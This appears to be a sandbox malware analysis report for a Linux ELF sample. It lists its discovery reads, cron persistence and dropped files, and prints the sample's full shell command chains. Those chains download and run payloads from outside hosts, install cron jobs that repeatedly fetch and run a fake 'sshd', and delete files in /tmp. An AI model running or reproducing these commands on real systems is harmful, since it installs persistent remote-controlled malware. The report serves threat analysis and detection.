metasploit | 3d8925edeadd34930c9118cf551c581d2422b618930cff4701006affb60f0c40

execution persistence privilege_escalatio

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	sshd
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	sshd
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	sshd
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	sshd

Creates/modifies Cron job 1 TTPs 5 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.e8oLXO	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.kG6sTm	crontab
File opened for modification	/etc/crontab	sh
File opened for modification	/etc/crontab	sh
File opened for modification	/var/spool/cron/crontabs/tmp.dcV7nF	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_name	sshd
File opened for reading	/sys/devices/virtual/dmi/id/board_version	sshd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	sshd
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	sshd
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	sshd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	sshd
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	sshd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	sshd
File opened for reading	/sys/devices/virtual/dmi/id/product_version	sshd
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	sshd
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	sshd
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	sshd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	sshd
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	sshd

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

description	ioc	Process
File opened for reading	/proc/cpuinfo	sshd

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	sshd
File opened for reading	/sys/devices/system/cpu/possible	sshd

Command and Scripting Interpreter: Unix Shell 1 TTPs 1 IoCs

Execute scripts via Unix Shell.

execution

Unix Shell

T1059.004

pid	Process
1635	sh

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/firmware/dmi/tables/DMI	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cpu_capacity	sshd
File opened for reading	/sys/kernel/mm/hugepages	sshd
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	sshd
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	sshd
File opened for reading	/sys/bus/dax/target_node	sshd
File opened for reading	/sys/fs/cgroup/cgroup.controllers	sshd
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/id	sshd
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	sshd
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	sshd
File opened for reading	/sys/devices/virtual/dmi/id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	sshd
File opened for reading	/sys/bus/cpu/devices	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	sshd
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	sshd
File opened for reading	/sys/bus/node/devices/node0/meminfo	sshd
File opened for reading	/sys/bus/dax/devices	sshd
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	sshd
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/cluster_cpus	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	sshd
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	sshd
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	sshd
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/id	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	sshd
File opened for reading	/sys/bus/node/devices/node0/cpumap	sshd
File opened for reading	/sys/bus/dax/devices/target_node	sshd
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	sshd
File opened for reading	/sys/devices/system/node/online	sshd

Reads runtime system information 11 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/driver/nvidia/gpus	sshd
File opened for reading	/proc/meminfo	sshd
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/exe	loadbit
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/mounts	sshd
File opened for reading	/proc/self/cpuset	sshd

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/seasbit	curl
File opened for modification	/tmp/loadbit	wget
File opened for modification	/tmp/loadbit	curl
File opened for modification	/tmp/ovlcap/merge/magic	loadbit
File opened for modification	/tmp/lushput	wget
File opened for modification	/tmp/lushput	curl
File opened for modification	/tmp/seasbit	wget

/tmp/2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf
/tmp/2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf
1⤵
PID:1572

/bin/sh
/bin/sh -c "wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/; chmod 777 /var/tmp/lovely; curl http://main.dsn.ovh/dns/lovely -s -o /var/tmp/lovely; chmod 777 /var/tmp/lovely; cd /var/tmp; ./lovely; cd /var/tmp; rm lovely; wget -nc http://main.dsn.ovh/dns/lushput -q -P /tmp/; chmod 777 /tmp/lushput; curl http://main.dsn.ovh/dns/lushput -s -o /tmp/lushput; chmod 777 /tmp/lushput; cd /tmp; ./lushput 'wget -nc http://main.dsn.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main.dsn.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow' 2>/dev/null; cd /tmp; rm -rf *; cd /tmp; rm -rf .pkexec; wget -nc http://main.dsn.ovh/dns/seasbit -q -P /tmp/; chmod 777 /tmp/seasbit; curl http://main.dsn.ovh/dns/seasbit -s -o /tmp/seasbit; chmod 777 /tmp/seasbit; wget -nc http://main.dsn.ovh/dns/loadbit -q -P /tmp/; chmod 777 /tmp/loadbit; curl http://main.dsn.ovh/dns/loadbit -s -o /tmp/loadbit; chmod 777 /tmp/loadbit; cd /tmp; ./loadbit 2>/dev/null; cd /tmp; rm -rf *"
1⤵
- File and Directory Permissions Modification
PID:1572
- /usr/bin/wget
  wget -nc http://main.dsn.ovh/dns/lovely -q -P /var/tmp/
  2⤵
  PID:1573
- /usr/bin/chmod
  chmod 777 /var/tmp/lovely
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /usr/bin/curl
  curl http://main.dsn.ovh/dns/lovely -s -o /var/tmp/lovely
  2⤵
  PID:1579
- /usr/bin/chmod
  chmod 777 /var/tmp/lovely
  2⤵
  - File and Directory Permissions Modification
  PID:1587
- /var/tmp/lovely
  ./lovely
  2⤵
  - Executes dropped EXE
  PID:1588
- /bin/sh
  /bin/sh -c "wget -nc http://main.dsn.ovh/dns/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://main.dsn.ovh/dns/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://main.dsn.ovh/dns/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://main.dsn.ovh/dns/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://main.dsn.ovh/dns/config.json -q -P /var/tmp/; curl http://main.dsn.ovh/dns/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://main.dsn.ovh/dns/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://main.dsn.ovh/dns/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://main.dsn.ovh/dns/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://main.dsn.ovh/dns/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://main.dsn.ovh/dns/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://main.dsn.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://main.dsn.ovh/dns/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://main.dsn.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
  2⤵
  - File and Directory Permissions Modification
  PID:1588
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/unix.sh -q -P /var/tmp/
    3⤵
    PID:1589
- - /usr/bin/chmod
    chmod 777 /var/tmp/unix.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1590
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/unix.sh -s -o /var/tmp/unix.sh
    3⤵
    PID:1591
- - /usr/bin/chmod
    chmod 777 /var/tmp/unix.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1593
- - /var/tmp/unix.sh
    ./unix.sh
    3⤵
    - Executes dropped EXE
    PID:1594
- - /bin/sh
    /bin/sh ./unix.sh
    3⤵
    PID:1594
- - /usr/bin/rm
    rm unix.sh
    3⤵
    PID:1596
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/sshd -q -P /var/tmp/
    3⤵
    PID:1597
- - /usr/bin/chmod
    chmod 777 /var/tmp/sshd
    3⤵
    - File and Directory Permissions Modification
    PID:1598
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/sshd -s -o /var/tmp/sshd
    3⤵
    PID:1599
- - /usr/bin/chmod
    chmod 777 /var/tmp/sshd
    3⤵
    - File and Directory Permissions Modification
    PID:1601
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/config.json -q -P /var/tmp/
    3⤵
    PID:1602
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/config.json -s -o /var/tmp/config.json
    3⤵
    PID:1603
- - /usr/bin/grep
    grep -qxF
    3⤵
    - Reads runtime system information
    PID:1606
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:1605
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:1608
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:1609
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/truct.sh -q -P /var/tmp/
    3⤵
    PID:1610
- - /usr/bin/chmod
    chmod 777 /var/tmp/truct.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1611
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/truct.sh -s -o /var/tmp/truct.sh
    3⤵
    PID:1612
- - /usr/bin/chmod
    chmod 777 /var/tmp/truct.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1614
- - /var/tmp/truct.sh
    ./truct.sh
    3⤵
    - Executes dropped EXE
    PID:1615
- - /bin/sh
    /bin/sh ./truct.sh
    3⤵
    PID:1615
  - - /usr/bin/grep
      grep -qxF "0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json'"
      4⤵
      File and Directory Permissions Modification
      Reads runtime system information
      PID:1617
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1616
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1619
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1620
- - /usr/bin/rm
    rm truct.sh
    3⤵
    PID:1621
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/brict.sh -q -P /var/tmp/
    3⤵
    PID:1622
- - /usr/bin/chmod
    chmod 777 /var/tmp/brict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1623
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/brict.sh -s -o /var/tmp/brict.sh
    3⤵
    PID:1624
- - /usr/bin/chmod
    chmod 777 /var/tmp/brict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1626
- - /var/tmp/brict.sh
    ./brict.sh
    3⤵
    - Executes dropped EXE
    PID:1627
- - /bin/sh
    /bin/sh ./brict.sh
    3⤵
    PID:1627
  - - /usr/bin/grep
      grep -qxF "* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'"
      4⤵
      Reads runtime system information
      PID:1629
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1628
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1631
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1632
- - /usr/bin/rm
    rm brict.sh
    3⤵
    PID:1633
- - /usr/bin/flock
    /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    PID:1634
  - - /bin/sh
      /bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
      4⤵
      Command and Scripting Interpreter: Unix Shell
      PID:1635
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/retrict.sh -q -P /var/tmp/
    3⤵
    PID:1637
- - /usr/bin/chmod
    chmod 777 /var/tmp/retrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1644
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh
    3⤵
    PID:1645
- - /usr/bin/chmod
    chmod 777 /var/tmp/retrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1647
- - /var/tmp/retrict.sh
    ./retrict.sh
    3⤵
    - Executes dropped EXE
    PID:1648
- - /bin/sh
    /bin/sh ./retrict.sh
    3⤵
    - Creates/modifies Cron job
    PID:1648
  - - /usr/bin/grep
      grep -qxF "0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json'" /etc/crontab
      4⤵
      File and Directory Permissions Modification
      Reads runtime system information
      PID:1649
- - /usr/bin/rm
    rm retrict.sh
    3⤵
    PID:1650
- - /usr/bin/wget
    wget -nc http://main.dsn.ovh/dns/politrict.sh -q -P /var/tmp/
    3⤵
    PID:1651
- - /usr/bin/chmod
    chmod 777 /var/tmp/politrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1653
- - /usr/bin/curl
    curl http://main.dsn.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh
    3⤵
    PID:1654
- - /usr/bin/chmod
    chmod 777 /var/tmp/politrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1656
- - /var/tmp/politrict.sh
    ./politrict.sh
    3⤵
    - Executes dropped EXE
    PID:1657
- - /bin/sh
    /bin/sh ./politrict.sh
    3⤵
    - Creates/modifies Cron job
    PID:1657
  - - /usr/bin/grep
      grep -qxF "* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'" /etc/crontab
      4⤵
      Reads runtime system information
      PID:1658
- - /usr/bin/rm
    rm politrict.sh
    3⤵
    PID:1659
- - /usr/bin/flock
    /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    PID:1660
- /usr/bin/rm
  rm lovely
  2⤵
  PID:1661
- /usr/bin/wget
  wget -nc http://main.dsn.ovh/dns/lushput -q -P /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1662
- /usr/bin/chmod
  chmod 777 /tmp/lushput
  2⤵
  - File and Directory Permissions Modification
  PID:1663
- /usr/bin/curl
  curl http://main.dsn.ovh/dns/lushput -s -o /tmp/lushput
  2⤵
  - Writes file to tmp directory
  PID:1664
- /usr/bin/chmod
  chmod 777 /tmp/lushput
  2⤵
  - File and Directory Permissions Modification
  PID:1666
- /tmp/lushput
  ./lushput "wget -nc http://main.dsn.ovh/dns/bitnow -q -P /var/tmp/; chmod 777 /var/tmp/bitnow; curl http://main.dsn.ovh/dns/bitnow -s -o /var/tmp/bitnow; chmod 777 /var/tmp/bitnow; cd /var/tmp; ./bitnow; cd /var/tmp; rm bitnow"
  2⤵
  - File and Directory Permissions Modification
  - Executes dropped EXE
  PID:1667
- /usr/bin/rm
  rm -rf 2636f4d5fa29c3747036d385c3eee167aba1aad58c29597d21df7e42c6149a35.elf "GCONV_PATH=." gdm3-config-err-iIuYvn lushput snap-private-tmp systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-ModemManager.service-CKFZXH systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-colord.service-yahEwh systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-power-profiles-daemon.service-0tVReK systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-switcheroo-control.service-md24eF systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-logind.service-frRyTc systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-oomd.service-lX8BEz systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-resolved.service-GVR3t3 systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-systemd-timedated.service-YDDFq1 systemd-private-d2ec2f2ab14d4848b3cb46367f2eb4cb-upower.service-9PB4Ix
  2⤵
  PID:1669
- /usr/bin/rm
  rm -rf .pkexec
  2⤵
  PID:1670
- /usr/bin/wget
  wget -nc http://main.dsn.ovh/dns/seasbit -q -P /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1671
- /usr/bin/chmod
  chmod 777 /tmp/seasbit
  2⤵
  - File and Directory Permissions Modification
  PID:1672
- /usr/bin/curl
  curl http://main.dsn.ovh/dns/seasbit -s -o /tmp/seasbit
  2⤵
  - Writes file to tmp directory
  PID:1673
- /usr/bin/chmod
  chmod 777 /tmp/seasbit
  2⤵
  - File and Directory Permissions Modification
  PID:1675
- /usr/bin/wget
  wget -nc http://main.dsn.ovh/dns/loadbit -q -P /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1676
- /usr/bin/chmod
  chmod 777 /tmp/loadbit
  2⤵
  - File and Directory Permissions Modification
  PID:1677
- /usr/bin/curl
  curl http://main.dsn.ovh/dns/loadbit -s -o /tmp/loadbit
  2⤵
  - Writes file to tmp directory
  PID:1678
- /usr/bin/chmod
  chmod 777 /tmp/loadbit
  2⤵
  - File and Directory Permissions Modification
  PID:1680
- /tmp/loadbit
  ./loadbit
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1681
- - /bin/sh
    sh -c "rm -rf './ovlcap/'"
    3⤵
    PID:1683
  - - /usr/bin/rm
      rm -rf ./ovlcap/
      4⤵
      PID:1684
- /tmp/ovlcap/upper/magic
  ./ovlcap/upper/magic shell
  2⤵
  PID:1681
- /bin/bash
  /bin/bash -c /tmp/seasbit
  2⤵
  PID:1681
- /tmp/seasbit
  /tmp/seasbit
  2⤵
  - Executes dropped EXE
  PID:1681
- /bin/sh
  /bin/sh -c "wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/mvt/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/mvt/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"
  2⤵
  - File and Directory Permissions Modification
  PID:1681
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/unix.sh -q -P /var/tmp/
    3⤵
    PID:1687
- - /usr/bin/chmod
    chmod 777 /var/tmp/unix.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1688
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/unix.sh -s -o /var/tmp/unix.sh
    3⤵
    PID:1689
- - /usr/bin/chmod
    chmod 777 /var/tmp/unix.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1691
- - /var/tmp/unix.sh
    ./unix.sh
    3⤵
    - Executes dropped EXE
    PID:1692
- - /usr/bin/rm
    rm unix.sh
    3⤵
    PID:1693
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/sshd -q -P /var/tmp/
    3⤵
    PID:1694
- - /usr/bin/chmod
    chmod 777 /var/tmp/sshd
    3⤵
    - File and Directory Permissions Modification
    PID:1695
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/sshd -s -o /var/tmp/sshd
    3⤵
    PID:1696
- - /usr/bin/chmod
    chmod 777 /var/tmp/sshd
    3⤵
    - File and Directory Permissions Modification
    PID:1698
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/config.json -q -P /var/tmp/
    3⤵
    PID:1699
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/config.json -s -o /var/tmp/config.json
    3⤵
    PID:1700
- - /usr/bin/grep
    grep -qxF
    3⤵
    - Reads runtime system information
    PID:1703
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:1702
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/truct.sh -q -P /var/tmp/
    3⤵
    PID:1704
- - /usr/bin/chmod
    chmod 777 /var/tmp/truct.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1705
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/truct.sh -s -o /var/tmp/truct.sh
    3⤵
    PID:1706
- - /usr/bin/chmod
    chmod 777 /var/tmp/truct.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1708
- - /var/tmp/truct.sh
    ./truct.sh
    3⤵
    - Executes dropped EXE
    PID:1709
- - /usr/bin/rm
    rm truct.sh
    3⤵
    PID:1710
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/brict.sh -q -P /var/tmp/
    3⤵
    PID:1711
- - /usr/bin/chmod
    chmod 777 /var/tmp/brict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1712
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/brict.sh -s -o /var/tmp/brict.sh
    3⤵
    PID:1713
- - /usr/bin/chmod
    chmod 777 /var/tmp/brict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1715
- - /var/tmp/brict.sh
    ./brict.sh
    3⤵
    - Executes dropped EXE
    PID:1716
- - /usr/bin/rm
    rm brict.sh
    3⤵
    PID:1717
- - /usr/bin/flock
    /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    PID:1718
- - /usr/bin/wget
    wget -nc http://dash.cloudflare.ovh/mvt/retrict.sh -q -P /var/tmp/
    3⤵
    PID:1719
- - /usr/bin/chmod
    chmod 777 /var/tmp/retrict.sh
    3⤵
    - File and Directory Permissions Modification
    PID:1720
- - /usr/bin/curl
    curl http://dash.cloudflare.ovh/mvt/retrict.sh -s -o /var/tmp/retrict.sh
    3⤵
    PID:1721
